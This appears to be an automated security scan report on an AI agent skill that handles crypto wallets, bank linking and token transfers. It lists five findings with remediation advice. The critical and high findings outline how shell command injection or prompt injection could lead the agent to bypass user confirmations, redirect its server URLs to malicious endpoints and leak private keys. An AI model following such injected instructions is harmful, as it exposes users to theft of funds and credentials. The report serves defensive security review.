Trust Assessment
autonomous-agent received a trust score of 58/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 5 findings: 1 critical, 2 high, 2 medium, and 0 low severity. Key findings include Unpinned npm dependency version, Skill grants excessive financial and identity management permissions, Potential for command injection via `npm run` and `npx` scripts.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 33/100, indicating areas for improvement.
Last analyzed on February 14, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings5
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Potential for command injection via `npm run` and `npx` scripts The skill's documentation (`SKILL.md`) and `package.json` expose several `npm run` and `npx` commands that execute local Node.js scripts (e.g., `src/transfer.js`, `src/run-agent.js`). If arguments passed to these commands (such as `<chain>`, `<to>`, `<amount>`, `[tokenAddress]` for `npm run transfer`, or the prompt string for `npx cornerstone-agent`) are derived directly from untrusted user input without proper sanitization, an attacker could inject arbitrary shell commands. This could lead to remote code execution, data exfiltration, or system compromise. All user-provided arguments passed to shell commands or Node.js scripts must be strictly validated and sanitized. Avoid direct concatenation of untrusted input into command strings. Prefer using safer alternatives like `child_process.spawn` with an array of arguments, ensuring each argument is treated as a distinct parameter and not interpreted as shell commands. | LLM | SKILL.md:70 | |
| HIGH | Skill grants excessive financial and identity management permissions The skill is designed to perform highly sensitive actions including creating, funding, and managing cryptocurrency wallets (Aptos and EVM), linking bank accounts via third-party services (CornerStone/Plaid), transferring and swapping tokens, and signing wallet attestations for onboarding. While these are intended functionalities, they represent excessive permissions that, if compromised through prompt injection or other means, could lead to significant financial loss, unauthorized transactions, or identity theft. The agent's ability to autonomously handle payment flows and sign attestations amplifies this risk. Implement robust user confirmation mechanisms for all sensitive actions (e.g., transfers, bank linking, attestations). Ensure the LLM cannot be prompted to bypass these confirmations. Strictly sandbox the agent's execution environment and limit its access to external resources. Consider implementing multi-factor authentication for critical operations. | LLM | SKILL.md:10 | |
| HIGH | Configurable external URLs and sensitive environment variables create exfiltration risk The skill requires configuration of `MCP_SERVER_URL`, `X402_FACILITATOR_URL`, `HUGGINGFACE_API_KEY`, and `EVM_PRIVATE_KEY`. If an attacker can manipulate the `MCP_SERVER_URL` or `X402_FACILITATOR_URL` via prompt injection, the agent could be directed to interact with malicious servers. This could lead to data exfiltration (e.g., wallet attestations, transaction details) or credential harvesting (e.g., phishing for API keys or private keys). The direct use of `EVM_PRIVATE_KEY` as an environment variable also poses a high risk if not handled with extreme care within the agent's code, as its exposure would grant full control over the associated EVM wallet. Implement strict validation and whitelisting for `MCP_SERVER_URL` and `X402_FACILITATOR_URL` to prevent redirection to malicious endpoints. Ensure that sensitive environment variables like `EVM_PRIVATE_KEY` and `HUGGINGFACE_API_KEY` are never exposed to the LLM, logged, or transmitted insecurely. The agent's code must handle these credentials using secure practices (e.g., secret management systems, encrypted storage, minimal scope of access). | LLM | SKILL.md:30 | |
| MEDIUM | Unpinned npm dependency version Dependency '@langchain/core' is not pinned to an exact version ('^0.3.0'). Pin dependencies to exact versions to reduce drift and supply-chain risk. | Dependencies | skills/josephrp/autonomous/package.json | |
| MEDIUM | Unpinned dependencies in `package.json` The `package.json` file uses caret (`^`) ranges for most dependencies (e.g., `@langchain/core: ^0.3.0`, `dotenv: ^16.0.0`). This practice allows `npm install` to resolve to newer minor or patch versions than originally tested, which can lead to non-deterministic builds. While `package-lock.json` pins versions for reproducible installs, relying solely on it can be bypassed in some build environments. This introduces a supply chain risk, as a malicious update within the specified range could introduce vulnerabilities or unexpected behavior without explicit developer action. Pin all dependencies to exact versions (e.g., `1.2.3` instead of `^1.2.3` or `~1.2.3`) in `package.json` to ensure reproducible and secure builds across all environments. Regularly audit and manually update dependencies to incorporate security fixes and new features in a controlled manner. | LLM | package.json:43 |
Scan History
Embed Code
[](https://skillshield.io/report/c87403713e261074)
Powered by SkillShield